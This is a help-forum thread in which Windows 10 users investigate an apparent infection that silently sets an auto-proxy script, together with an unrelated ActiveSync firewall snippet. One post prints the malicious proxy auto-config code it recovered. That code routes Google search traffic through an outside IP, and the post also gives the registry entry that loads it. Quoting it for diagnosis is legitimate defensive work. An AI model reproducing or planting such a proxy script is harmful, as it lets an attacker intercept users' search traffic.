Windows 10: infection? outbound localhost.world to ip 69.197.188.122

Got an email from someone that reported a antimalware program was reporting outbound localhost.world to ip 69.197.188.122.

The warning came when using browsers or some other programs that connected to the net, any idea what this is?

:)

 

Windows 10 auto enables "Use Proxy Script" after reboots

Now I actually found out that something keeps changing this setting even when after startup I made sure it was disabled. What the **** is this thing...

Edit

After some research. I downloaded the localhost.world file looked what's inside and found this, which is kind of worrying

function FindProxyForURL(url, host) {

ba = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ba.test(url)) { return "PROXY 69.197.188.122:8484" }

bb = /^https?:\/\/www\.google\.[a-zA-Z.]+\/\?(.*)$/;if (bb.test(url)) { return "PROXY 69.197.188.122:8484" }

bc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (bc.test(url)) { return "PROXY 69.197.188.122:8484" }

bd = /^https?:\/\/www\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bd.test(url)) { return "PROXY 69.197.188.122:8484" }

be = /^https?:\/\/www\.google\.[a-zA-Z.]+\/s\?(.*)$/;if (be.test(url)) { return "PROXY 69.197.188.122:8484" }

bf = /^https?:\/\/cse\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bf.test(url)) { return "PROXY 69.197.188.122:8484" }

return "DIRECT";

}

Adwcleaner, Malwarebytes and ESET found nothing. MS Malicious removal thing didn't find anything either.

After some more research, I'm not the only one facing that exact same problem with cmd window opening up and then chrome force closing.

Also had this in registry which I removed

[HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings] "AutoConfigURL"="http://localhost.world/localhost.host"

Also had odd certificates. Some DO_NOT_TRUST_fiddlerroot, nope, no thanks, got rid of those as well.

Going through task scheduler, don't see anything odd there disguised that kills chrome.exe or any other browser and updates the setting.

Turns out I've had something going on here and now I'm left with picking up pieces because no AV found anything

 

ActiveSync 4.5 and Kerio Personal Firewall and Asus P535

I assume you followed the instructions about the inbound/outbound connections:



1. Allow inbound/outbound connections on the following programs:

wcescomm.exe (ActiveSync Application)

WCESMgr.exe (Activesync Connection Manager)

rapimgr.exe (ActiveSync RAPI Manager)

CEAPPMGR.exe (This one shows up as Application Manager in Sunbelt)

2. Open up TCP/IP port 26675 to inbound/outbound traffic.

 

Hi Cixoos.
I think localhost.world is possibly a redirect from a botnet (possibly Zeroaccess rootkit). 69.197.188.122 is Wholesale Internet out of Kansas.

If you think you have an infection or rootkit: Please download TDSSKiller and run it.

What antivirus do you have on your system?

 

It was malwarebytes that reported it i found out.

I have now tested the machine with eset antivirus, nothing.
Then tdsskiller and notjing
Then housecall online and nothing
roguekiller- Deleted some registry entries, but nothing serious
zhpcleaner, found some stuff and cleaned.

Then I blocked the ip in eset firewall with popup notification. It says asus printer utilities are trying constant outbound to 69.197.188.122

 

That is the first time I've ever heard of this!

Want to try one more thing?

aswMBR
aswMBR Download

 

strange thing indeed, if 69.197.188.122 is blocked with firewall, it is impossible to log in to router on local ip 192.168.1.1.

 

Now I'm really confused....that makes no sense to me.
If you unblock, and access router, can you check for firmware updates on it?

 

I'm having this issue as well. I'm on my laptop with a clean install of Windows 10 and an unfortunate "accident" in which I had to go back to a restore point because I became infected with multiple rootkits and viruses.

Malwarebytes keeps indicating it is blocking localhost.world at that same ip address listed above. I've run

*Hijackthis
*Hitman Pro
*Emsisoft Emergency Kit

I removed a few entries with Hijackthis related to BHO search stuff in ie, I've also reset both browsers, and other scanners didn't find anything of note, but I'm still getting the blocking notification.

Eager to see what else you've found out!

T.

 

Hi Tsidhu and welcome to Tenforums.

Please try TDSSKiller and aswMBR in my posts above and report back the results.

 

Are you using an asus router?

 

I found a post on Malwarebytes mb constant stopping 69.197.188.122, localhost.world - Website Blocking - Malwarebytes Forum The person has a similar problem with the ip being blocked by Malwarebytes while it was attempting to go outbound, originating from different programs (including legitimate ones). He had an ASUS router (I'm not sure if that's what Cixoos is going with this). Then a Malwarebytes employee commented "The block is being removed." This may imply that it is a false positive, but the meaning is unclear. If r router is infected with fake firmware (ASUS specifically had a vulnerability in routers), can usually fix it by resetting the router using a reset pin on the back of it, or unplugging it from the mains for a few minutes. Then, install the latest firmware from the manufacturer.

 

But try this first: Go to Network and Sharing Center -> Internet Options -> Connections -> Lan Settings Uncheck "Automatically detect settings" and "Use automatic configuration script" and click OK. Then run Malwarebytes.